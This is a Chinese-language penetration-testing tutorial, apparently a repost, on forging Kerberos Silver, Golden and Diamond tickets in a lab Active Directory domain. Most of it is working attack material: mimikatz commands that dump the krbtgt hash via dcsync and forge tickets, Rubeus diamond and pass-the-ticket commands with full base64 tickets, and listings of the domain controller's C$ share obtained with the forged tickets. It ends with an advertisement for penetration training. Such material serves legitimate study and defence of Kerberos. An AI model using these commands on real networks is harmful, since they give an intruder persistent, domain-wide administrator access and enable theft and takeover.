内网渗透 银/金/钻石票据
内网渗透 银/金/钻石票据1白银票据(SilverTickets)原理在Kerberos认证的第5步,Client带着ST和身份认证-3向Server上的某个服务进行请求,Server接收到了Clie 2022-7-12 14:35:16 Author: moonsec(查看原文) 阅读量:254 收藏
内网渗透 银/金/钻石票据
1
白银票据(SilverTickets)

原理

Kerberos认证的第5步,Client带着ST和身份认证-3Server上的某个服务进行请求,Server接收到了Client发送的请求之后,通过自己的ket解密ST,从而获得一个sessionkey,通过解密的sessionkey验证对方的身份,验证成功就可以使Client访问Server上的指定的服务

白银票据伪造的是TGS票据,不需要和域控打交道。白银票据使用要访问服务的hash,而不是krbtgthash。需要注意的一点是,伪造的白银票据没有带有有KDC签名的PAC,如果目标主机配置为验证KDCPAC签名,则白银票据将不起作用。白银票据只能访问指定的服务。

需要导出krbtgtHash

mimikatzlog "lsadump::dcsync /domain:test.local /user:krbtgt"

找到SID

whoami/user

需要域名称

netconfig workstation

准备

1.域名nami.com

2.sidS-1-5-21-1332701932-261370409-2888687086-500

3.目标服务器名WIN-A7DM9L6CVHH.nami.com

4.可利用的服务cifs

5.服务账号的NTMLHASH a6f9a989c9fad5637b1e1e941286da19

6.需要伪造的用户名tset

mimikatz.exe"kerberos::golden /domain:nami.com/sid:S-1-5-21-1332701932-261370409-2888687086/target:WIN-A7DM9L6CVHH.nami.com /service:cifs/rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /ptt" "exit"

mimikatz执行结果

.#####.  mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ##  /***Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ /##       > https://blog.gentilkiwi.com/mimikatz '## v ##'      Vincent LE TOUX             ( [email protected] ) '#####'        > https://pingcastle.com / https://mysmartlogon.com***/
mimikatz(commandline) # kerberos::golden/domain:nami.com /sid:S-1-5-21-1332701932-261370409-2888687086/target:WIN-A7DM9L6CVHH.nami.com /service:cifs/rc4:a6f9a989c9fad5637b1e1e941286da19 /user:testa /pttUser     : testaDomain    : nami.com (NAMI)SID       :S-1-5-21-1332701932-261370409-2888687086User Id   : 500GroupsId : *513 512 520 518 519 ServiceKey:a6f9a989c9fad5637b1e1e941286da19 - rc4_hmac_nt      Service   :cifsTarget    : WIN-A7DM9L6CVHH.nami.comLifetime  :2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/7 19:27:16->Ticket : ** Pass The Ticket **
 * PAC generated *PAC signed * EncTicketPart generated * EncTicketPartencrypted * KrbCred generated
Golden ticket for'testa @ nami.com' successfully submitted for currentsession
mimikatz(commandline) # exitBye!

查看票据

Rebues.exe klistAction:List Kerberos Tickets (Current User)
[*] Current LUID    :0x67e95
  UserName                 : win7  Domain                  : NAMI0  LogonId                  : 0x67e95 UserSID                  :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage    : Kerberos  LogonType                :Interactive  LogonTime                : 2022/7/9 18:51:29 LogonServer              : WIN-A7DM9L6CVHH LogonServerDNSDomain     : NAMI.COM  UserPrincipalName        :[email protected]
    [0] - 0x17 - rc4_hmac     Start/End/MaxRenew: 2022/7/10 19:27:16 ; 2032/7/7 19:27:16 ; 2032/7/719:27:16      Server Name       :cifs/WIN-A7DM9L6CVHH.nami.com @ nami.com      Client Name      : testa @ nami.com      Flags             : pre_authent,renewable, forwardable (40a00000)

访问DCcifs服务

C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$\
驱动器\\WIN-A7DM9L6CVHH.nami.com\c$中的卷没有标签。
卷的序列号是1EDD-1C0F

\\WIN-A7DM9L6CVHH.nami.com\c$

的目录

2022/03/22 22:20         1,345,536 msf.exe2016/07/16  21:23    <DIR>         PerfLogs2022/03/22  21:05    <DIR>         Program Files2016/07/16  21:23    <DIR>          ProgramFiles (x86)2022/03/22  23:06             7,168shell3.exe2022/03/22  21:03    <DIR>         Users2022/03/22  23:35    <DIR>          Windows              2 个文件     1,352,704字节              5 个目录51,494,420,480可用字节

使用Rebues.exepruge之后就会清空票据

Rubeus.exe purge
    [*] Action: Purge Tickets    Luid: 0x0   [+] Tickets successfully purged!

C:\Users\win7.NAMI0\Desktop>dir\\WIN-A7DM9L6CVHH.nami.com\c$
2
黄金票据(GoldenTicket)

原理

黄金票据伪造的是TGT,在Kerberos认证中的第3步。在身份认证成功之后,AS使用krbtgthash加密TGT票据返回给Client。如果知道了krbtgt用户的密码hash可以直接伪造任意用户的TGT出来,所以就没有与域控制器的AS_REQAS_REP进行通信了。

准备

1、域名称nami.com

2、域的SIDS-1-5-21-1332701932-261370409-2888687086-502

3、域的KRBTGT账号的HASH5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37

4、伪造任意用户名testb

执行mimikatz命令,制作黄金票据

mimikatz.exe"kerberos::golden /user:Administrator /domain:nami.com/sid:S-1-5-21-1332701932-261370409-2888687086/aes256:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/ticket:Administrator.kiribi" "exit"

mimikatz执行结果

.#####.  mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ##  /***Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ /##       > https://blog.gentilkiwi.com/mimikatz '## v ##'      Vincent LE TOUX             ( [email protected] ) '#####'        > https://pingcastle.com / https://mysmartlogon.com***/
mimikatz(commandline) # kerberos::pttAdministrator.kiribi
* File: 'Administrator.kiribi':OK
mimikatz(commandline) # exitBye!



mimikatz.exe"kerberos::ptt Administrator.kiribi" "exit"  ______       _                        (_____ \      | |                       _____) )_   _| |__  _____ _   _  ___   |  __  /|| | |  _ \| ___ | | | |/___)  | |  \ \| |_| | |_) ) ____| |_||___ |  |_|   |_|____/|____/|_____)____/(___/
 v2.1.1 

Action: List Kerberos Tickets (CurrentUser)
[*] Current LUID    : 0x67e95
  UserName                : win7  Domain                   : NAMI0 LogonId                  : 0x67e95  UserSID                  :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage    : Kerberos  LogonType                :Interactive  LogonTime                : 2022/7/9 18:51:29 LogonServer              : WIN-A7DM9L6CVHH LogonServerDNSDomain     : NAMI.COM  UserPrincipalName        :win7@nami.com
    [0] - 0x12 - aes256_cts_hmac_sha1     Start/End/MaxRenew: 2022/7/10 20:12:25 ; 2032/7/7 20:12:25 ;2032/7/7 20:12:25      Server Name       : krbtgt/nami.com @nami.com      Client Name       : Administrator @ nami.com     Flags             : pre_authent, initial, renewable, forwardable(40e00000)
    [1] - 0x12 - aes256_cts_hmac_sha1     Start/End/MaxRenew: 2022/7/10 20:12:42 ; 2022/7/11 6:12:42 ;2022/7/17 20:12:42      Server Name       :cifs/WIN-A7DM9L6CVHH.nami.com @ NAMI.COM

 Client Name      : Administrator @ nami.com
     Flags             :name_canonicalize, ok_as_delegate, pre_authent, renewable,forwardable (40a50000)

dir\\WIN-A7DM9L6CVHH.nami.com\c$

C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$\
驱动器\\WIN-A7DM9L6CVHH.nami.com\c$中的卷没有标签。
卷的序列号是1EDD-1C0F

\\WIN-A7DM9L6CVHH.nami.com\c$

的目录

2022/03/22 22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>         PerfLogs
2022/03/22  21:05    <DIR>         Program Files
2016/07/16  21:23    <DIR>          ProgramFiles (x86)
2022/03/22  23:06             7,168shell3.exe
2022/03/22  21:03    <DIR>         Users
2022/03/22  23:35    <DIR>          Windows
             2

个文件     1,352,704字节
             5 个目录51,494,420,480可用字节

3
钻石票据(diamondticket)

原理

黄金票据和钻石票据都需要Krbgtg密钥。黄金票据攻击利用了从头开始伪造TGT,而钻石票据攻击利用了对域控制器请求的真实TGT进行解密和重新加密的能力。

准备

1、域krbtgthash

2、当前域用户的账号密码

3、域名

4、域控的名称

假设已经获得了krbtgt

krbtgt: 5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37

使用域用户用户名密码创建一个钻石TGT

Rubeus.exediamond/krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/user:win7 /password:[email protected] /enctype:aes /domain:nami.com/dc:WIN-A7DM9L6CVHH.nami.com /ticketuser:thor /ticketuserid:1104/groups:512

输出结果

 ______       _                        (_____ \      | |                       _____) )_   _| |__  _____ _   _  ___   |  __  /|| | |  _ \| ___ | | | |/___)  | |  \ \| |_| | |_) ) ____| |_||___ |  |_|   |_|____/|____/|_____)____/(___/
 v2.1.1 
[*] Action: Diamond Ticket
[*] Usingdomain controller: WIN-A7DM9L6CVHH.nami.com (10.0.20.16)[!]Pre-Authentication required![!] AES256 Salt: NAMI.COMwin7[*]Using aes256_cts_hmac_sha1 hash:052F11E5B96B8E8699FF99E32E6BF2A4005C8B31FDD67DD88F8F9F08EBD65F02[*]Building AS-REQ (w/ preauth) for: 'nami.com\win7'[*] Usingdomain controller: 10.0.20.16:88[+] TGT request successful![*]base64(ticket.kirbi):
     doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC    oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5lnP9C/TjjQvkCaRG    9YQuorVlVI7ZBcAgFbo7W5Wq2g8P44QYX8G0dtTOwJJ3xkujzCnO4jLtsvvSG35ph0xfxrzof28AYG6K    1qjiyTQZe2h9fBoWHRzf78jGQHc1Z/fMpwbtt0cr76g5ArbTGsW3jgNMoz34pEuxv/39H0TrtpNAw7Ih    FXHCI8gfMrw8H3Vo4fVFsWiHaub5djsBx4g6Yj0WpjLrNeX6tY8ovFNA9E2CLNqL+YVLc+29IwMlz0m/    /b8pE+2KZDzhUWZ19kQjqD8wGs54Zro7jPlOqD51OYGvhllhpuDtOlSk+2+fiZMkb81eYe/3WCyzcWd5    ehn3Ut5IQzelrt2NWM4mZOcXpTEWno1YSC8QhexN4B17y2apILXVHe1u7w1TSG7U1L1ONet5lhW3sObH    huYzPC7k1Sb3OH0rUdv20m75mfgXC51g3yT2FWJlwbetPJl3VRWiiM3grXC3St1BAVFFzynui9197Kad    j8ZsAk3+6kOJvVvzBlGgR1CIXyOUGQH9EJ3fGuqrEBc5t+SjoZhVpCv8S2bbpav1yJYcE6UTDrlGlssj    qHQK3kJMqmDz7iyYS1z7yH7DDDY/UACiIlUG4hvkv2HP5NU9I2ZQzY+5xtSmTW+bxED0tx+nj4XMcJeU    +NUImXb1+dY/Fb6XYZred3OpR16wj4CbB65Zk6ze3naVnqm1z4IKiavi6nqkylwMmmBZaBP5HFTXQGyc    mtec+smV3MmsBUiLCiOz12v2apDvUYS7gYiHZnD819F+u8K4eL8UBxLivt5dM+JzWcZL/x5NGlqvwckc    rW6ARmgEM4PzjZ19LnvkmxlGfVT5P/8Dd5BsGHByHHNu2feM8kwXdxJn5KPXGSxJcRdCqGiLXH4wTo/5    kOKO9QEX0mEfe7R598Y1QAoC4n4VfLC5KhOm3KN5dCEFxynqDYQYOPfyWduAfVre90yxP4S/aKRbHHVn    Rmq+iNzs9fJZavQLFOYnWWIgvsBk6Jm9WUeFqr/SHPnTxzkmblCjFi/H+pZSAg+4VkdjP+VGCIJGhKtF    sxEcquf+JUb2ttARQb1c9OyGTbC7pJfzz7tp33wS21bzXiK3TsJ8NgKT9pBt0qOTqx5DkWXqKu8mpPYJ    iYyxAjpRlaOO/tVY+0JZIF7PKVjT6xsLPlNfq5ocBBPrXrCXSPL8qGDCHUjEKrYgd1Khs/ToEXgmoKpm    vNzAy4XDdIOdzZChpgwbYcS0gZI9YriO6C1xQNkSQgQp5d4MWNF7NVijgdYwgdOgAwIBAKKBywSByH2B    xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCBEtEF4ifDsQ/GCwfhSOUphHOXJjPoaY/hIlQ8VrKL36aEK    GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAEDhAAClERgPMjAyMjA3MTAxMDA5MDJaphEY    DzIwMjIwNzEwMjAwOTAyWqcRGA8yMDIyMDcxNzEwMDkwMlqoChsITkFNSS5DT02pHTAboAMCAQKhFDAS     GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT[*]Retreiving PAC[*] Modifying PAC[*] Signing PAC[*]Encrypting Modified TGT
[*] base64(ticket.kirbi):
    doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC    oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0d    wW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcF    vnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0    JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqs    Px5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmE    dnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJ    r/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRu    snAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9o    KRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ    +oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4Jhqb    daofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpP    IdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdz    U9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOT    paMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfb    Qgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR    1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6L    eTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw    KaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6AD    AgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJa    pxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D     T00=



使用tgt deleg技巧创建钻石TGT:

C:\Rubeus>Rubeus.exe diamond/krbkey:5d441cb67b5b173667668c2c6f658a23d58320922290f7b05af44458debdeb37/tgtdeleg /ticketuser:thor /ticketuserid:1104 /groups:512

输出结果

 ______       _                        (_____ \      | |                       _____) )_   _| |__  _____ _   _  ___   |  __  /|| | |  _ \| ___ | | | |/___)  | |  \ \| |_| | |_) ) ____| |_||___ |  |_|   |_|____/|____/|_____)____/(___/
 v2.1.1 
[*] Action: Diamond Ticket
[*] Notarget SPN specified, attempting to build 'cifs/dc.domain.com'[*]Initializing Kerberos GSS-API w/ fake delegation for target'cifs/WIN-A7DM9L6CVHH.nami.com'[+] Kerberos GSS-APIinitialization success![+] Delegation requset success! AP-REQdelegation ticket is now in GSS-API output.[*] Found the AP-REQdelegation ticket in the GSS-API output.[*] Authenticatoretype: aes256_cts_hmac_sha1[*] Extracted the service ticketsession key from the ticket cache:BzaMDaTaD6S9eF3ZYpZznQGqHim4GrZNG3N/1zyaubA=[+] Successfullydecrypted the authenticator[*] base64(ticket.kirbi):
    doIE+jCCBPagAwIBBaEDAgEWooIEDzCCBAthggQHMIIEA6ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC    oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA88wggPLoAMCARKhAwIBAqKCA70EggO5pe4JhXrlmSbGCz+w    1O1L1B0XEbFDJUO+8DbnCn3MT6P/tIt38Ly+Zrz8KWnhrRKMOqTfiwAaaQ4F/dhydnmbqEz79zgWf0Ie    Fiu5ictNEUgNy2qR0WO4MOOiRfInPoWGXHs+aJW/rIEjT6y7QudUGhzLToBq3LZvZiI6JRo+Rk4NvPs3    E5S1LeSbwigxtrIgRYXV0O3qG0LMIlEbGzJjj71ZMMQZBoBY9ARCN4KWz6bsLomOqAPsaQzyHpPuoFmQ    Uap5Mf3/p8gSj4zXdRiGz+4R3Mw2av83uos4bY5N4twSX6Tz8vra6hap2weEpaPFQJZrSriBQLpB0+em    Kz2dRMLZU6oJqkZjvNxHtmq9fo3HebvjlXdT8k0Ww4jedFBrN5eQyezK6a55nr4R5IawK4a0wxwnnAmo    J46kusBuqFYe4K/dqmuWAOaPUXIydF8WqlieSJiw5a97c3ZAJ/4AThFZnmO9hBX5GuT4oa+NowW8Vipz    EmdyTZVujVcWnk5wlgvYiSZJP+ooY2B5z09FEZGWJJnnI1SA+yER2Y+vNtJ+vWxNhBYWdOboX137osmO    3LrPHUcVvxDV4n+7ml1BMa0FXiMmxwPptmht1DhV/7CdJBIi68dnnYLIXdLghqeYixlIc8H+gUHUEykg    5lmQ8iDgV9vKOYVI6uk7LERO8DkO6NnAswK4YpA2XGZiSdZqWgUYnNKRMjgF+lPski8pmE8VUQXP2h5t    NBSvQrrivUs/8pAppETkXkLjv3xkIlzgEOwdl3gbcUDpPnGaT41YO/vrwymugRciuzfsMiwspV96Cith    apcBahSxo7AA7PgMab9pOvYBnnxI1z0sPD7QhweXsf3Uwoz3Qy7xPyWZwjqdJ+uTPVvYLJtqahQ2kk2X    sBESFzYlG8brnVDFORM8XaVI2+hCRgGj1uy/+3EPo8v+fMpt1a/jeS1/vfm8IcUBV9HpBVbdLp4SGoui    lp9bWkhr+Bd19CwHJjqZfNBoJqfRd6TEwgKxWtjXWE28rHrqCKrm0brozF8j7EGCmzTZ3MFiQj/faMM2    yRMrlboD/in9fJiKbaXehlpE7qvSbpiANyqabdZRB/C4PAFtbf5a8xP2dmAt2nbKtxh3KLwi7kjgGI//    9vLJEwgx1No06DONFhKlP3WhoJ5VYDPfNSv8PKwYmrSKBGCmeiJ7vgpY+Q5/gtyNAj2j6kyX6B7vOLA7    ZTSskmNjuYAOYRhai6sGtvp0t+DIiSX1S+DYKyyq3aYNDvH6AaGSmpujgdYwgdOgAwIBAKKBywSByH2B    xTCBwqCBvzCBvDCBuaArMCmgAwIBEqEiBCD/fE5Z49iKW+LbijggS7K44DP9DgIy9Rss1PIWjpTKoaEK    GwhOQU1JLkNPTaIRMA+gAwIBAaEIMAYbBHdpbjejBwMFAGChAAClERgPMjAyMjA3MTAwOTQ1NTBaphEY    DzIwMjIwNzEwMTk0MTUzWqcRGA8yMDIyMDcxNzA5NDE1M1qoChsITkFNSS5DT02pHTAboAMCAQKhFDAS     GwZrcmJ0Z3QbCE5BTUkuQ09N
[*] Decrypting TGT[*]Retreiving PAC[*] Modifying PAC[*] Signing PAC[*]Encrypting Modified TGT
[*] base64(ticket.kirbi):
    doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgEC    oRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpSsngeghif/mcTl6M    NYsPa2KZAP96iM+zjJtUi0Un9nK+uWmyWP7/tqurYDMX4UCuvsKlNY+hoU2el5GIntt4MfL0Qtj9805N    qjpb2ta7dhPkptfEtobJXcaWpA1Yh8wExlteZxZDd6GdZN4lncQgRTN43IynDFMR8GiH+L7WcooqVaUm    Lev9kjEnNVBFCAtT3qFhG6qgFdVgz6gg+ByC45QrLI8auJE3aVaKsfiSgm+GHii5v5VoMFT9/4mxfbLn    cfLlpJR6mTDXYSqK/xCVuQeUqhmvE3/4sJ1UdAWWu/2TvuvRWN1TdzxvVW9HXzq8i+pK48MZaym8xBa6    pio1oJ+3ZqoU5UuH+tXXr/z+Iex32TsvJnX5vlUj7mOU1AsiV56axG/To05y15SfTn0eIqE2QBpcfvYs    saqpVkoCHFeENkd36E0akHijmQA1OLJeJA0zkighHtsWnMLdJWUXSI5zZH0lOSsVssJ248OBqIaKOdnf    1bThgMLcvXTvKjxGYoiB+f1t8Catbv9cNqvKbq9/dlSf9nBZMGy60QFZNuqMqgwRrAXpLmiCCxZJtbIE    vR38oJvHbkP75ugfMLsDrw5Ctl04lzRo+Big8Z+SDBUOtuGngnELdgCQqtqh7GiZtaFy4xQupzBqvhrG    2BY3I85IoD++5q8VrtKOI7GfD9GaDUZvjyA+bxfN7EXKJi9eOqt7mkmusz5o54zHgRerhYsQ7k16k14n    ZlsA7ufT97Z1osvGPD7lAcA6b3SohY3IhrUHxwccFRNMLabfSHzT1TYlaT/+yByMA+eulPa9RE8yFDWn    A2dEodb8EW06JWzHpI27R7dCrm6X11QOBT2gWFdMzm2klAjGfJDkD9doBADoqqwdIxwT2aTI32UHjlQd    lsTwtfY0/wzCCAkwKQAAVxf93avCYDXh2y75Rcp5MvkCJJu3Z2SoYWRgYk2M3JcMTWGAyZJCPx8mQShF    nkdgNGgnA2+ISVMUOMZsREv2ev8Jslzl4ii+Xqnwl1+fNYcMjdhBZmY2hYNENpTpxC/nBQcNftPeDniC    vOwR7lRTE+tW39ylVRWlYV5y6SPyslVYWE+PfRauGcOAmZZmJNYJUCNjs3c9560zqKQEjBXQtyWJXXrq    y7HZ+SFD95caxYK9cJp2YZLkjIEKUwxCjHcHvj1cA6Hy3TJTAgvxoxpPrYCDyRhG8OZ4RilZ8h7aOxMR    94mtBxnQNFbDAax1I6IHhWrc/D0pXZhvaaOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCsw    KaADAgESoSIEIP98Tlnj2Ipb4tuKOCBLsrjgM/0OAjL1GyzU8haOlMqhoQobCE5BTUkuQ09NohEwD6AD    AgEBoQgwBhsEdGhvcqMHAwUAYKEAAKURGA8yMDIyMDcxMDA5NDU1MFqmERgPMjAyMjA3MTAxOTQxNTNa    pxEYDzIwMjIwNzE3MDk0MTUzWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5D     T00=




ptt导入票据

Rubeus.exeptt/ticket:doIE6jCCBOagAwIBBaEDAgEWooID/zCCA/thggP3MIID86ADAgEFoQobCE5BTUkuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhOQU1JLkNPTaOCA78wggO7oAMCARKhAwIBA6KCA60EggOpfzZJAr20ictB3k0dwW1Rf4Cf+zYcVKwy2nMslhq5dZE6fDNSo3uvFQitPagJd+sXp6TvOIbjYADnaM/dG0+ZbUAbAENDWtcFvnCFp84wfr/cQOuE/cs4qkfS2HjetSiZASuLBo/rvsHzKhjqmvzilVwdnwB8E863O8XKmFi6qYFmZbj0JQyR5wW0f/GHFkK56yocOuFzclGlSuIF0Y4OglBWRwj76zZAvl4rAZ8iBeq4nHNptTAM1xF2OTrFwpqsPx5oewPrMrO2+DF/nAzwNDQ2skgeoCRqRMWmSx+bS2QkWF0kWAywUhbc1beS6AsfrBTSzZGZFYG9HGmEdnAk1vH8si2fX+GNvOWInl5hFk7bd+oCtebAMOAbnAHgHBoMsoirBvFzv3E0EUl32+skNwu6KMuQExwJr/4fZOsSOoCQpF5KBDgclbEW7q0y/D5Ru+6idC2TgWrRDz+1Jmpyi+LVsYJ/xH65kP73hVsj+cUTPQRusnAmo8aAd0Cnv8M7AKlLk77d4nxnWFtWyohTQQ6/yb3eaXuJWYDJhnzvuF2+j1IeMssUaOoB7SC38d9oKRGWzl7der+iYBoGateapkOx51YUCabec5k7KkLE46OYSUBlJw3I7A/ZjmBr6AG8YqOwlCAmMJA3xuqZ+oviKtKfu8O4fxJ82samGPBhwkEObNh4nh4HHIfkEn729y6GxWEHYIkkNjnBsxULQa32aNr3pXD4JhqbdaofS0a4p9n1XvySs6wwLnzlq5Ce2cYn9NPE9Ag+Ov9yEirVpgUf2FcqJYtqnTD+fR7PQ+OW0QjSohpPIdDZkp9HvYwqstwNXuGFcFxOKtQDFxUH/IZNb28f0cdZny/ouduusHEjXHv2CzIW3eNlDxJ2YC5TDLdzU9evIpA/crdSsXAIX/3s7TR5TIFc0saw2JmnJViccPEC8gHLS1mocKGxSvNGOMNruQY97198dggoGEOTpaMsyjTC9b77nP7MJh4wC2IvjjpcvGLhLl4HAAX9YYlgJ5+SwFEWMSnd26VIK916XrkCIiqvw9mi/xfbQgfoy4sm1+CdLCuZcfgBGOPAq8dZTMbo1Wfv5GzPXePZWGEAh8D9b+ELrC+GPmLWXCfyX0cB1aashgFR1PE2p0E9m26kzJ+67oBOwYyiG//je13ugrtK/yu2KiHk2r9RRcMUM0A6GI2ypwVPWMAoj87lKPuN0C6LeTz6NI9SA/Z6CxsxFn6l6waL2uTNdUZpQqOB1jCB06ADAgEAooHLBIHIfYHFMIHCoIG/MIG8MIG5oCswKaADAgESoSIEIES0QXiJ8OxD8YLB+FI5SmEc5cmM+hpj+EiVDxWsovfpoQobCE5BTUkuQ09NohEwD6ADAgEBoQgwBhsEdGhvcqMHAwUAQOEAAKURGA8yMDIyMDcxMDEwMDkwMlqmERgPMjAyMjA3MTAyMDA5MDJapxEYDzIwMjIwNzE3MTAwOTAyWqgKGwhOQU1JLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsITkFNSS5DT00=

输出结果

 ______       _                        (_____ \      | |                       _____) )_   _| |__  _____ _   _  ___   |  __  /|| | |  _ \| ___ | | | |/___)  | |  \ \| |_| | |_) ) ____| |_||___ |  |_|   |_|____/|____/|_____)____/(___/
 v2.1.1 

Action: List Kerberos Tickets (CurrentUser)
[*] Current LUID    : 0x67e95
  UserName                : win7  Domain                   : NAMI0 LogonId                  : 0x67e95  UserSID                  :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage    : Kerberos  LogonType                :Interactive  LogonTime                : 2022/7/9 18:51:29 LogonServer              : WIN-A7DM9L6CVHH LogonServerDNSDomain     : NAMI.COM  UserPrincipalName        :win7@nami.com
    [0] - 0x12 - aes256_cts_hmac_sha1     Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ;2022/7/17 18:09:02      Server Name       : krbtgt/NAMI.COM @NAMI.COM      Client Name       : thor @ NAMI.COM     Flags             : name_canonicalize, pre_authent, initial,renewable, forwardable (40e10000)



查看票据

Action:List Kerberos Tickets (Current User)
[*] Current LUID    :0x67e95
  UserName                 : win7  Domain                  : NAMI0  LogonId                  : 0x67e95 UserSID                  :S-1-5-21-1332701932-261370409-2888687086-1602 AuthenticationPackage    : Kerberos  LogonType                :Interactive  LogonTime                : 2022/7/9 18:51:29 LogonServer              : WIN-A7DM9L6CVHH LogonServerDNSDomain     : NAMI.COM  UserPrincipalName        :[email protected]
    [0] - 0x12 - aes256_cts_hmac_sha1     Start/End/MaxRenew: 2022/7/10 18:09:02 ; 2022/7/11 4:09:02 ;2022/7/17 18:09:02      Server Name       :krbtgt/NAMI.COM @ NAMI.COM      Client Name       : thor @NAMI.COM      Flags             : name_canonicalize,pre_authent, initial, renewable, forwardable (40e10000)

再次访问域控制器

C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$\
驱动器\\WIN-A7DM9L6CVHH.nami.com\c$中的卷没有标签。
卷的序列号是1EDD-1C0F

\\WIN-A7DM9L6CVHH.nami.com\c$

的目录

2022/03/22 22:20         1,345,536 msf.exe
2016/07/16  21:23    <DIR>         PerfLogs
2022/03/22  21:05    <DIR>         Program Files
2016/07/16  21:23    <DIR>          ProgramFiles (x86)
2022/03/22  23:06             7,168shell3.exe
2022/03/22  21:03    <DIR>         Users
2022/03/22  23:35    <DIR>          Windows
             2

个文件     1,352,704字节
             5 个目录51,494,420,480可用字节

清除票据

C:\Users\win7.NAMI0\Desktop>Rubeus.exe klist
   ______        _  (_____ \      | |  _____) )_   _| |__  _____ _   _  ___  |  __  /| | | |  _ \| ___| | | |/___)  | |  \ \| |_| | |_) ) ____| |_| |___ |  |_|  |_|____/|____/|_____)____/(___/
  v2.1.1

Action:List Kerberos Tickets (Current User)
[*] Current LUID    :0x67e95


再次访问域控制器C:\Users\win7.NAMI0>dir\\WIN-A7DM9L6CVHH.nami.com\c$拒绝访问。
4
关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

渗透培训

需要渗透测试培训联系暗月


